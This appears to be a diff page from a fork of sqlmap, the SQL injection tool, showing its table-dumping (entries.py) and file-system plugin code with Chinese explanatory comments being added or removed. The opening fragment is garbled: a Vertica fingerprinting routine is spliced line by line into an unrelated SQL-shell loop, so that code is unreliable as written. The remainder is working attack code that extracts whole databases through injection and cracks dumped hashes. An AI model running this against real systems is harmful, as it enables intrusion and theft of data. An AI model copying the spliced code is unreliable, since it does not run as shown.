%sbanner parsing fingerprint: %s" % (blank, banVer) # 将 banner 版本信息添加到指纹信息
return None
else:
if sqlType:
infoMsg = "executing %s statement: '%s'" % (sqlType if sqlType is not None else "SQL", query)
else:
infoMsg = "executing unknown SQL command: '%s'" % query
logger.info(infoMsg)
htmlErrorFp = Format.getErrorParsedDBMSes() # 获取 HTML 错误信息中的数据库信息
inject.goStacked(query)
if htmlErrorFp:
value += "\
%shtml error message fingerprint: %s" % (blank, htmlErrorFp) # 将 HTML 错误信息中的数据库信息添加到指纹信息
output = NULL
return value # 返回指纹信息
except SqlmapNoneDataException as ex:
logger.warning(ex)
# 定义 checkDbms 方法,用于检查数据库类型是否为 Vertica
def checkDbms(self):
if not conf.extensiveFp and Backend.isDbmsWithin(VERTICA_ALIASES): # 如果不需要详细指纹并且数据库别名匹配
setDbms(DBMS.VERTICA) # 设置数据库类型为 Vertica
self.getBanner() # 获取数据库 banner 信息
return True # 返回 True
return output
infoMsg = "testing %s" % DBMS.VERTICA # 输出正在测试 Vertica 的信息
def sqlShell(self):
infoMsg = "calling %s shell. To quit type " % Backend.getIdentifiedDbms()
infoMsg += "'x' or 'q' and press ENTER"
logger.info(infoMsg)
# NOTE: Vertica works too without the CONVERT_TO()
result = inject.checkBooleanExpression("BITSTRING_TO_BINARY(NULL) IS NULL") # 使用 SQL 注入检查
autoCompletion(AUTOCOMPLETE_TYPE.SQL)
if result: # 如果检查结果为 True
infoMsg = "confirming %s" % DBMS.VERTICA # 输出确认是 Vertica 的信息
logger.info(infoMsg)
while True:
query = None
result = inject.checkBooleanExpression("HEX_TO_INTEGER(NULL) IS NULL") # 使用 SQL 注入检查
try:
query = _input("sql-shell> ")
query = getUnicode(query, encoding=sys.stdin.encoding)
query = query.strip("; ")
except UnicodeDecodeError:
print()
errMsg = "invalid user input"
logger.error(errMsg)
except KeyboardInterrupt:
print()
errMsg = "user aborted"
logger.error(errMsg)
except EOFError:
print()
errMsg = "exit"
logger.error(errMsg)
break
if not result: # 如果检查结果为 False
warnMsg = "the back-end DBMS is not %s" % DBMS.VERTICA # 输出警告信息
logger.warning(warnMsg)
return False # 返回 False
if not query:
continue
setDbms(DBMS.VERTICA) # 设置数据库类型为 Vertica
self.getBanner() # 获取数据库 banner 信息
if query.lower() in ("x", "q", "exit", "quit"):
break
if not conf.extensiveFp: # 如果不需要详细指纹信息
return True # 返回 True
output = self.sqlQuery(query)
infoMsg = "actively fingerprinting %s" % DBMS.VERTICA # 输出正在进行详细指纹识别的信息
logger.info(infoMsg)
if output and output != "Quit":
conf.dumper.sqlQuery(query, output)
# 根据 CALENDAR_HIERARCHY_DAY(NULL) 的结果判断 Vertica 版本
if inject.checkBooleanExpression("CALENDAR_HIERARCHY_DAY(NULL) IS NULL"):
Backend.setVersion(">= 9.0") # 设置数据库版本为 >= 9.0
else:
Backend.setVersion("< 9.0") # 设置数据库版本为 < 9.0
elif not output:
pass
elif output != "Quit":
dataToStdout("No output\n")
return True # 返回 True
else: # 如果检查结果为 False
warnMsg = "the back-end DBMS is not %s" % DBMS.VERTICA # 输出警告信息
logger.warning(warnMsg)
return False # 返回 False
def sqlFile(self):
infoMsg = "executing SQL statements from given file(s)"
logger.info(infoMsg)
for filename in re.split(PARAMETER_SPLITTING_REGEX, conf.sqlFile):
filename = filename.strip()
if not filename:
continue
snippet = getSQLSnippet(Backend.getDbms(), filename)
if snippet and all(query.strip().upper().startswith("SELECT") for query in (_ for _ in snippet.split(';' if ';' in snippet else '\n') if _)):
for query in (_ for _ in snippet.split(';' if ';' in snippet else '\n') if _):
query = query.strip()
if query:
conf.dumper.sqlQuery(query, self.sqlQuery(query))
else:
conf.dumper.sqlQuery(snippet, self.sqlQuery(snippet))

1411
src/sqlmap-master/plugins/generic/databases.py
View File

File diff suppressed because it is too large Load Diff

239
src/sqlmap-master/plugins/generic/entries.py
Unescape View File

@ -5,14 +5,10 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
# 导入正则表达式模块
import re
# 从lib.core.agent模块导入agent对象用于处理注入过程中的各种细节
from lib.core.agent import agent
# 从lib.core.bigarray模块导入BigArray类用于高效存储和处理大量数据
from lib.core.bigarray import BigArray
# 从lib.core.common模块导入各种常用函数和常量如Backend、clearConsoleLine、getLimitRange等
from lib.core.common import Backend
from lib.core.common import clearConsoleLine
from lib.core.common import getLimitRange
@ -29,47 +25,33 @@ from lib.core.common import singleTimeLogMessage
from lib.core.common import singleTimeWarnMessage
from lib.core.common import unArrayizeValue
from lib.core.common import unsafeSQLIdentificatorNaming
# 从lib.core.convert模块导入getConsoleLength函数用于获取控制台字符串的长度
from lib.core.convert import getConsoleLength
from lib.core.convert import getUnicode
# 从lib.core.data模块导入conf和kb对象用于存储配置信息和知识库信息
from lib.core.data import conf
from lib.core.data import kb
# 从lib.core.data模块导入logger对象用于记录日志信息
from lib.core.data import logger
# 从lib.core.data模块导入queries对象用于存储各种数据库的查询语句
from lib.core.data import queries
# 从lib.core.dicts模块导入DUMP_REPLACEMENTS字典用于替换转储数据中的特殊字符
from lib.core.dicts import DUMP_REPLACEMENTS
# 从lib.core.enums模块导入各种枚举类型如CHARSET_TYPE、DBMS、EXPECTED、PAYLOAD等
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS
from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD
# 从lib.core.exception模块导入各种自定义异常类
from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapUnsupportedFeatureException
# 从lib.core.settings模块导入各种配置常量
from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD
from lib.core.settings import CURRENT_DB
from lib.core.settings import METADB_SUFFIX
from lib.core.settings import NULL
from lib.core.settings import PLUS_ONE_DBMSES
from lib.core.settings import UPPER_CASE_DBMSES
# 从lib.request模块导入inject函数用于执行SQL注入
from lib.request import inject
# 从lib.utils.hash模块导入attackDumpedTable函数用于对转储的表数据进行攻击
from lib.utils.hash import attackDumpedTable
# 从lib.utils.pivotdumptable模块导入pivotDumpTable函数用于执行透视转储表操作
from lib.utils.pivotdumptable import pivotDumpTable
# 导入第三方six库用于兼容Python 2和Python 3
from thirdparty import six
# 导入第三方six库的zip函数并重命名为_zip
from thirdparty.six.moves import zip as _zip
# 定义Entries类用于封装枚举数据库条目的相关功能
class Entries(object):
"""
This class defines entries' enumeration functionalities for plugins.
@ -78,12 +60,9 @@ class Entries(object):
def __init__(self):
pass
# 定义dumpTable方法用于转储指定表的条目
def dumpTable(self, foundData=None):
# 强制执行数据库枚举,确保已获取数据库类型
self.forceDbmsEnum()
# 如果没有指定数据库或指定为当前数据库,则获取当前数据库
if conf.db is None or conf.db == CURRENT_DB:
if conf.db is None:
warnMsg = "missing database parameter. sqlmap is going "
@ -92,81 +71,65 @@ class Entries(object):
logger.warning(warnMsg)
conf.db = self.getCurrentDb()
# 如果指定了数据库
elif conf.db is not None:
# 如果数据库是属于大写数据库类型,则将其转换为大写
if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES:
conf.db = conf.db.upper()
# 如果数据库名包含逗号,则抛出异常,因为只允许一个数据库名
if ',' in conf.db:
errMsg = "only one database name is allowed when enumerating "
errMsg += "the tables' columns"
raise SqlmapMissingMandatoryOptionException(errMsg)
# 如果数据库名匹配排除模式,则跳过
if conf.exclude and re.search(conf.exclude, conf.db, re.I) is not None:
infoMsg = "skipping database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
singleTimeLogMessage(infoMsg)
return
# 对数据库名进行安全处理
conf.db = safeSQLIdentificatorNaming(conf.db) or ""
# 如果指定了表
if conf.tbl:
# 如果表名是属于大写数据库类型,则将其转换为大写
if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES:
conf.tbl = conf.tbl.upper()
# 将表名拆分为列表
tblList = conf.tbl.split(',')
# 如果没有指定表
else:
# 获取所有表
self.getTables()
# 如果已缓存表信息
if len(kb.data.cachedTables) > 0:
# 获取表列表
tblList = list(six.itervalues(kb.data.cachedTables))
# 如果表列表嵌套,则解包
if tblList and isListLike(tblList[0]):
tblList = tblList[0]
# 如果指定了数据库但未能获取表信息
elif conf.db and not conf.search:
errMsg = "unable to retrieve the tables "
errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
raise SqlmapNoneDataException(errMsg)
else:
return
# 对表名列表中的表名进行安全处理
for tbl in tblList:
tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True)
# 遍历表列表
for tbl in tblList:
# 如果检测到键盘中断,则跳出循环
if kb.dumpKeyboardInterrupt:
break
# 如果表名匹配排除模式,则跳过
if conf.exclude and re.search(conf.exclude, tbl, re.I) is not None:
infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl)
singleTimeLogMessage(infoMsg)
continue
# 设置当前表名
conf.tbl = tbl
# 初始化已转储的表数据
kb.data.dumpedTable = {}
# 如果没有传入已发现的列数据
if foundData is None:
# 清空缓存的列信息
kb.data.cachedColumns = {}
# 获取列信息,仅获取列名,并设置转储模式
self.getColumns(onlyColNames=True, dumpMode=True)
# 如果传入了已发现的列数据,则直接使用
else:
kb.data.cachedColumns = foundData
try:
# 根据数据库类型设置转储表名
if Backend.isDbms(DBMS.INFORMIX):
kb.dumpTable = "%s:%s" % (conf.db, tbl)
elif Backend.isDbms(DBMS.SQLITE):
@ -176,7 +139,6 @@ class Entries(object):
else:
kb.dumpTable = "%s.%s" % (conf.db, tbl)
# 如果未能获取列信息,则跳过当前表
if safeSQLIdentificatorNaming(conf.db) not in kb.data.cachedColumns or safeSQLIdentificatorNaming(tbl, True) not in kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] or not kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]:
warnMsg = "unable to enumerate the columns for table '%s'" % unsafeSQLIdentificatorNaming(tbl)
if METADB_SUFFIX.upper() not in conf.db.upper():
@ -186,16 +148,12 @@ class Entries(object):
continue
# 获取当前表的列信息
columns = kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]
# 对列名列表进行排序
colList = sorted(column for column in columns if column)
# 如果指定了排除模式,则从列名列表中排除匹配的列
if conf.exclude:
colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None]
# 如果没有可用的列名,则跳过当前表
if not colList:
warnMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl)
if METADB_SUFFIX.upper() not in conf.db.upper():
@ -203,11 +161,9 @@ class Entries(object):
warnMsg += " (no usable column names)"
logger.warning(warnMsg)
continue
# 设置全局变量 kb.dumpColumns 为当前表需要转储的列名列表
kb.dumpColumns = [unsafeSQLIdentificatorNaming(_) for _ in colList]
# 将列名列表转换为逗号分隔的字符串
colNames = colString = ','.join(column for column in colList)
# 获取转储表的根查询
rootQuery = queries[Backend.getIdentifiedDbms()].dump_table
infoMsg = "fetching entries"
@ -217,22 +173,18 @@ class Entries(object):
if METADB_SUFFIX.upper() not in conf.db.upper():
infoMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
logger.info(infoMsg)
# 遍历列名列表,对每个列名进行预处理
for column in colList:
_ = agent.preprocessField(tbl, column)
if _ != column:
colString = re.sub(r"\b%s\b" % re.escape(column), _.replace("\\", r"\\"), colString)
# 初始化条目计数
entriesCount = 0
# 如果存在可用的注入技术,或使用了--direct参数
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
# 初始化条目列表
entries = []
query = None
# 根据数据库类型构建查询语句
if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL):
query = rootQuery.inband.query % (colString, tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())))
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.MCKOI, DBMS.EXTREMEDB, DBMS.RAIMA):
@ -295,10 +247,9 @@ class Entries(object):
query = rootQuery.inband.query % (colString, conf.db, tbl)
query = agent.whereQuery(query)
# 如果没有获取到条目,并且查询语句存在,并且没有检测到键盘中断
if not entries and query and not kb.dumpKeyboardInterrupt:
try:
# 执行查询语句,获取条目信息
entries = inject.getValue(query, blind=False, time=False, dump=True)
except KeyboardInterrupt:
entries = None
@ -306,7 +257,7 @@ class Entries(object):
clearConsoleLine()
warnMsg = "Ctrl+C detected in dumping phase"
logger.warning(warnMsg)
# 如果成功获取到条目
if not isNoneValue(entries):
if isinstance(entries, six.string_types):
entries = [entries]
@ -315,7 +266,6 @@ class Entries(object):
entriesCount = len(entries)
# 遍历每个列名和条目,更新转储的表数据信息
for index, column in enumerate(colList):
if column not in kb.data.dumpedTable:
kb.data.dumpedTable[column] = {"length": len(column), "values": BigArray()}
@ -323,20 +273,19 @@ class Entries(object):
for entry in entries:
if entry is None or len(entry) == 0:
continue
# 如果条目是字符串类型
if isinstance(entry, six.string_types):
colEntry = entry
# 否则,获取指定索引的条目
else:
colEntry = unArrayizeValue(entry[index]) if index < len(entry) else u''
maxLen = max(getConsoleLength(column), getConsoleLength(DUMP_REPLACEMENTS.get(getUnicode(colEntry), getUnicode(colEntry))))
# 更新最大长度
if maxLen > kb.data.dumpedTable[column]["length"]:
kb.data.dumpedTable[column]["length"] = maxLen
# 添加条目值
kb.data.dumpedTable[column]["values"].append(colEntry)
# 如果没有转储表数据,并且可以使用盲注方式,且不是直接模式
if not kb.data.dumpedTable and isInferenceAvailable() and not conf.direct:
infoMsg = "fetching number of "
if conf.col:
@ -344,8 +293,7 @@ class Entries(object):
infoMsg += "entries for table '%s' " % unsafeSQLIdentificatorNaming(tbl)
infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
logger.info(infoMsg)
# 构建盲注获取条目计数的查询语句
if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL):
query = rootQuery.blind.count % (tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())))
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.MAXDB, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MCKOI, DBMS.EXTREMEDB, DBMS.RAIMA):
@ -359,22 +307,21 @@ class Entries(object):
query = agent.whereQuery(query)
# 执行盲注查询,获取条目计数
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
lengths = {}
entries = {}
# 如果条目计数为0
if count == 0:
warnMsg = "table '%s' " % unsafeSQLIdentificatorNaming(tbl)
warnMsg += "in database '%s' " % unsafeSQLIdentificatorNaming(conf.db)
warnMsg += "appears to be empty"
logger.warning(warnMsg)
# 初始化长度和条目
for column in colList:
lengths[column] = len(column)
entries[column] = []
# 如果未能获取条目计数
elif not isNumPosStrValue(count):
warnMsg = "unable to retrieve the number of "
if conf.col:
@ -384,7 +331,7 @@ class Entries(object):
logger.warning(warnMsg)
continue
# 对于特定数据库
elif Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.SYBASE, DBMS.MAXDB, DBMS.MSSQL, DBMS.INFORMIX, DBMS.MCKOI, DBMS.RAIMA):
if Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.MCKOI, DBMS.RAIMA):
table = tbl
@ -392,7 +339,7 @@ class Entries(object):
table = "%s.%s" % (conf.db, tbl) if conf.db else tbl
elif Backend.isDbms(DBMS.INFORMIX):
table = "%s:%s" % (conf.db, tbl) if conf.db else tbl
# 如果是mssql并且没有强制透视
if Backend.isDbms(DBMS.MSSQL) and not conf.forcePivoting:
warnMsg = "in case of table dumping problems (e.g. column entry order) "
warnMsg += "you are advised to rerun with '--force-pivoting'"
@ -422,7 +369,7 @@ class Entries(object):
clearConsoleLine()
warnMsg = "Ctrl+C detected in dumping phase"
logger.warning(warnMsg)
# 如果没有获取到条目,且没有检测到键盘中断
if not entries and not kb.dumpKeyboardInterrupt:
try:
retVal = pivotDumpTable(table, colList, count, blind=True)
@ -435,12 +382,12 @@ class Entries(object):
if retVal:
entries, lengths = retVal
# 对于其他数据库
else:
emptyColumns = []
plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES
indexRange = getLimitRange(count, plusOne=plusOne)
# 如果列的数量小于行数,且大于阈值,则进行空列检查
if len(colList) < len(indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD:
debugMsg = "checking for empty columns"
logger.debug(infoMsg)
@ -451,7 +398,7 @@ class Entries(object):
debugMsg = "column '%s' of table '%s' will not be " % (column, kb.dumpTable)
debugMsg += "dumped as it appears to be empty"
logger.debug(debugMsg)
try:
for index in indexRange:
for column in colList:
@ -462,7 +409,7 @@ class Entries(object):
if column not in entries:
entries[column] = BigArray()
# 根据不同的数据库类型,构建盲注查询语句
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.CLICKHOUSE):
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index)
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE,):
@ -481,10 +428,10 @@ class Entries(object):
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, tbl, index)
query = agent.whereQuery(query)
# 执行盲注查询,获取值
value = NULL if column in emptyColumns else inject.getValue(query, union=False, error=False, dump=True)
value = '' if value is None else value
# 更新最大长度和条目值
lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value))))
entries[column].append(value)
@ -493,15 +440,14 @@ class Entries(object):
clearConsoleLine()
warnMsg = "Ctrl+C detected in dumping phase"
logger.warning(warnMsg)
# 遍历获取到的条目将结果保存到kb.data.dumpedTable中
for column, columnEntries in entries.items():
length = max(lengths[column], len(column))
kb.data.dumpedTable[column] = {"length": length, "values": columnEntries}
# 获取总行数
entriesCount = len(columnEntries)
# 如果没有转储表数据或者条目数为0且有权限标识
if len(kb.data.dumpedTable) == 0 or (entriesCount == 0 and kb.permissionFlag):
warnMsg = "unable to retrieve the entries "
if conf.col:
@ -510,18 +456,15 @@ class Entries(object):
warnMsg += "in database '%s'%s" % (unsafeSQLIdentificatorNaming(conf.db), " (permission denied)" if kb.permissionFlag else "")
logger.warning(warnMsg)
else:
# 保存转储的信息,包括总行数、表名和数据库名
kb.data.dumpedTable["__infos__"] = {"count": entriesCount,
"table": safeSQLIdentificatorNaming(tbl, True),
"db": safeSQLIdentificatorNaming(conf.db)}
try:
# 对转储的数据进行攻击
attackDumpedTable()
except (IOError, OSError) as ex:
errMsg = "an error occurred while attacking "
errMsg += "table dump ('%s')" % getSafeExString(ex)
logger.critical(errMsg)
# 将转储的数据传递给dumper
conf.dumper.dbTableValues(kb.data.dumpedTable)
except SqlmapConnectionException as ex:
@ -530,46 +473,40 @@ class Entries(object):
logger.critical(errMsg)
finally:
# 清空全局变量
kb.dumpColumns = None
kb.dumpTable = None
# 定义dumpAll方法用于转储所有数据库中的所有表的所有条目
def dumpAll(self):
# 如果指定了数据库,但没有指定表,则只转储该数据库下的表
if conf.db is not None and conf.tbl is None:
self.dumpTable()
return
# 如果是MySQL数据库且没有information_schema
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
errMsg = "information_schema not available, "
errMsg += "back-end DBMS is MySQL < 5.0"
raise SqlmapUnsupportedFeatureException(errMsg)
infoMsg = "sqlmap will dump entries of all tables from all databases now"
logger.info(infoMsg)
# 清空表和列的全局变量
conf.tbl = None
conf.col = None
# 获取所有表
self.getTables()
# 如果有缓存的表信息
if kb.data.cachedTables:
if isinstance(kb.data.cachedTables, list):
kb.data.cachedTables = {None: kb.data.cachedTables}
# 遍历数据库和表
for db, tables in kb.data.cachedTables.items():
conf.db = db
for table in tables:
if conf.exclude and re.search(conf.exclude, table, re.I) is not None:
infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(table)
logger.info(infoMsg)
continue
try:
conf.tbl = table
kb.data.cachedColumns = {}
@ -580,57 +517,45 @@ class Entries(object):
infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(table)
logger.info(infoMsg)
# 定义dumpFoundColumn方法用于转储已发现的列
def dumpFoundColumn(self, dbs, foundCols, colConsider):
message = "do you want to dump found column(s) entries? [Y/n] "
# 询问用户是否要转储已发现的列
if not readInput(message, default='Y', boolean=True):
return
dumpFromDbs = []
message = "which database(s)?\
[a]ll (default)\
"
message = "which database(s)?\n[a]ll (default)\n"
# 构建数据库选项
for db, tblData in dbs.items():
if tblData:
message += "[%s]\
" % unsafeSQLIdentificatorNaming(db)
message += "[%s]\n" % unsafeSQLIdentificatorNaming(db)
message += "[q]uit"
# 接收用户选择
choice = readInput(message, default='a')
# 处理用户选择
if not choice or choice in ('a', 'A'):
dumpFromDbs = list(dbs.keys())
elif choice in ('q', 'Q'):
return
else:
dumpFromDbs = choice.replace(" ", "").split(',')
# 遍历数据库
for db, tblData in dbs.items():
if db not in dumpFromDbs or not tblData:
continue
conf.db = db
dumpFromTbls = []
message = "which table(s) of database '%s'?\
" % unsafeSQLIdentificatorNaming(db)
message += "[a]ll (default)\
"
message = "which table(s) of database '%s'?\n" % unsafeSQLIdentificatorNaming(db)
message += "[a]ll (default)\n"
# 构建表选项
for tbl in tblData:
message += "[%s]\
" % tbl
message += "[%s]\n" % tbl
message += "[s]kip\
"
message += "[s]kip\n"
message += "[q]uit"
# 接收用户选择
choice = readInput(message, default='a')
# 处理用户选择
if not choice or choice in ('a', 'A'):
dumpFromTbls = tblData
elif choice in ('s', 'S'):
@ -639,120 +564,80 @@ class Entries(object):
return
else:
dumpFromTbls = choice.replace(" ", "").split(',')
# 遍历表
for table, columns in tblData.items():
if table not in dumpFromTbls:
continue
conf.tbl = table
colList = [_ for _ in columns if _]
# 如果指定了排除模式,则排除匹配的列
if conf.exclude:
colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None]
# 设置需要转储的列
conf.col = ','.join(colList)
kb.data.cachedColumns = {}
kb.data.dumpedTable = {}
data = self.dumpTable(dbs)
# 如果成功转储了数据则传递给dumper
if data:
conf.dumper.dbTableValues(data)
def dumpFoundTables(self, tables):
# 1. 定义一个消息,询问用户是否要转储发现的表条目
message = "do you want to dump found table(s) entries? [Y/n] "
# 2. 使用 readInput 函数获取用户输入,默认值为 'Y' (是),并将其转换为布尔值
# 如果用户输入 'n' (否) 或者其他非 'y' 的值,则返回 False否则返回 True。
# 如果用户输入为否,则直接返回,不进行后续的转储操作
if not readInput(message, default='Y', boolean=True):
return
# 3. 初始化一个空列表 dumpFromDbs用于存储用户选择要转储的数据库
dumpFromDbs = []
# 4. 构建一个消息,用于提示用户选择要转储的数据库,其中 [a]ll (default) 表示默认选择全部数据库
message = "which database(s)?\
[a]ll (default)\
"
message = "which database(s)?\n[a]ll (default)\n"
# 5. 遍历传入的 tables 字典,该字典的键是数据库名,值是该数据库下的表列表
for db, tablesList in tables.items():
# 6. 如果该数据库有表,则将数据库名添加到消息中,并进行安全 SQL 标识符命名处理
if tablesList:
message += "[%s]\
" % unsafeSQLIdentificatorNaming(db)
message += "[%s]\n" % unsafeSQLIdentificatorNaming(db)
# 7. 在消息中添加一个选项 [q]uit允许用户退出
message += "[q]uit"
# 8. 使用 readInput 函数获取用户输入,默认值为 'a',表示选择全部数据库
choice = readInput(message, default='a')
# 9. 如果用户没有输入或者输入为 'a' (或 'A'),则将所有数据库添加到 dumpFromDbs 列表中
if not choice or choice.lower() == 'a':
dumpFromDbs = list(tables.keys())
# 10. 如果用户输入为 'q' (或 'Q'),则直接返回,不进行后续的转储操作
elif choice.lower() == 'q':
return
# 11. 否则,将用户输入的数据库名按逗号分割,并添加到 dumpFromDbs 列表中
else:
dumpFromDbs = choice.replace(" ", "").split(',')
# 12. 遍历 tables 字典,键是数据库名,值是该数据库下的表列表
for db, tablesList in tables.items():
# 13. 如果当前数据库不在 dumpFromDbs 列表中,或者当前数据库没有表,则跳过该数据库
if db not in dumpFromDbs or not tablesList:
continue
# 14. 将当前数据库名赋值给 conf.db (全局配置参数)
conf.db = db
# 15. 初始化一个空列表 dumpFromTbls用于存储用户选择要转储的表
dumpFromTbls = []
# 16. 构建一个消息,用于提示用户选择当前数据库下要转储的表
message = "which table(s) of database '%s'?\
" % unsafeSQLIdentificatorNaming(db)
# 17. 在消息中添加一个选项 [a]ll (default),表示默认选择全部表
message += "[a]ll (default)\
"
# 18. 遍历当前数据库下的表列表,将表名添加到消息中,并进行安全 SQL 标识符命名处理
message = "which table(s) of database '%s'?\n" % unsafeSQLIdentificatorNaming(db)
message += "[a]ll (default)\n"
for tbl in tablesList:
message += "[%s]\
" % unsafeSQLIdentificatorNaming(tbl)
message += "[%s]\n" % unsafeSQLIdentificatorNaming(tbl)
# 19. 在消息中添加一个选项 [s]kip允许用户跳过当前数据库的表
message += "[s]kip\
"
# 20. 在消息中添加一个选项 [q]uit允许用户退出
message += "[s]kip\n"
message += "[q]uit"
# 21. 使用 readInput 函数获取用户输入,默认值为 'a',表示选择全部表
choice = readInput(message, default='a')
# 22. 如果用户没有输入或者输入为 'a' (或 'A'),则将所有表添加到 dumpFromTbls 列表中
if not choice or choice.lower() == 'a':
dumpFromTbls = tablesList
# 23. 如果用户输入为 's' (或 'S'),则跳过当前数据库的表,继续处理下一个数据库
elif choice.lower() == 's':
continue
# 24. 如果用户输入为 'q' (或 'Q'),则直接返回,不进行后续的转储操作
elif choice.lower() == 'q':
return
# 25. 否则,将用户输入的表名按逗号分割,并添加到 dumpFromTbls 列表中
else:
dumpFromTbls = choice.replace(" ", "").split(',')
# 26. 遍历 dumpFromTbls 列表,该列表存储当前数据库下要转储的表名
for table in dumpFromTbls:
# 27. 将当前表名赋值给 conf.tbl (全局配置参数)
conf.tbl = table
# 28. 清空 kb.data.cachedColumns (全局配置参数) 缓存的列信息
kb.data.cachedColumns = {}
# 29. 清空 kb.data.dumpedTable (全局配置参数) 缓存的表数据
kb.data.dumpedTable = {}
# 30. 调用 self.dumpTable() 函数,转储当前表的数据
data = self.dumpTable()
# 31. 如果转储成功 (data 不为空),则将转储的数据传递给 conf.dumper.dbTableValues() 函数进行后续处理
if data:
conf.dumper.dbTableValues(data)
conf.dumper.dbTableValues(data)

522
src/sqlmap-master/plugins/generic/filesystem.py
Unescape View File

@ -5,496 +5,320 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import codecs # 用于处理不同编码的文本
import os # 用于与操作系统进行交互
import sys # 用于访问与系统相关的参数和函数
from lib.core.agent import agent # 导入 agent 模块,用于与数据库进行交互
from lib.core.common import Backend # 导入 Backend 模块,用于获取数据库信息
from lib.core.common import checkFile # 导入 checkFile 函数,用于检查文件是否存在
from lib.core.common import dataToOutFile # 导入 dataToOutFile 函数,用于将数据写入文件
from lib.core.common import decloakToTemp # 导入 decloakToTemp 函数,用于将伪装的文件名转换为临时文件路径
from lib.core.common import decodeDbmsHexValue # 导入 decodeDbmsHexValue 函数,用于解码数据库的十六进制数据
from lib.core.common import isListLike # 导入 isListLike 函数,用于检查是否为列表类型
from lib.core.common import isNumPosStrValue # 导入 isNumPosStrValue 函数,用于检查是否为正数字符串
from lib.core.common import isStackingAvailable # 导入 isStackingAvailable 函数,用于检查是否支持堆叠查询
from lib.core.common import isTechniqueAvailable # 导入 isTechniqueAvailable 函数,用于检查是否支持某种注入技术
from lib.core.common import readInput # 导入 readInput 函数,用于读取用户输入
from lib.core.compat import xrange # 导入 xrange 函数,用于生成数字序列
from lib.core.convert import encodeBase64 # 导入 encodeBase64 函数,用于进行 Base64 编码
from lib.core.convert import encodeHex # 导入 encodeHex 函数,用于进行十六进制编码
from lib.core.convert import getText # 导入 getText 函数,用于将数据转换为文本
from lib.core.convert import getUnicode # 导入 getUnicode 函数,用于将数据转换为 Unicode
from lib.core.data import conf # 导入 conf 模块,用于获取全局配置信息
from lib.core.data import kb # 导入 kb 模块,用于获取全局知识库信息
from lib.core.data import logger # 导入 logger 模块,用于打印日志信息
from lib.core.enums import CHARSET_TYPE # 导入 CHARSET_TYPE 枚举,用于指定字符集类型
from lib.core.enums import DBMS # 导入 DBMS 枚举,用于指定数据库类型
from lib.core.enums import EXPECTED # 导入 EXPECTED 枚举,用于指定预期的数据类型
from lib.core.enums import PAYLOAD # 导入 PAYLOAD 枚举,用于指定攻击载荷类型
from lib.core.exception import SqlmapUndefinedMethod # 导入 SqlmapUndefinedMethod 异常,用于处理未定义的方法
from lib.core.settings import UNICODE_ENCODING # 导入 UNICODE_ENCODING 变量,用于指定 Unicode 编码
from lib.request import inject # 导入 inject 模块,用于进行 SQL 注入
import codecs
import os
import sys
from lib.core.agent import agent
from lib.core.common import Backend
from lib.core.common import checkFile
from lib.core.common import dataToOutFile
from lib.core.common import decloakToTemp
from lib.core.common import decodeDbmsHexValue
from lib.core.common import isListLike
from lib.core.common import isNumPosStrValue
from lib.core.common import isStackingAvailable
from lib.core.common import isTechniqueAvailable
from lib.core.common import readInput
from lib.core.compat import xrange
from lib.core.convert import encodeBase64
from lib.core.convert import encodeHex
from lib.core.convert import getText
from lib.core.convert import getUnicode
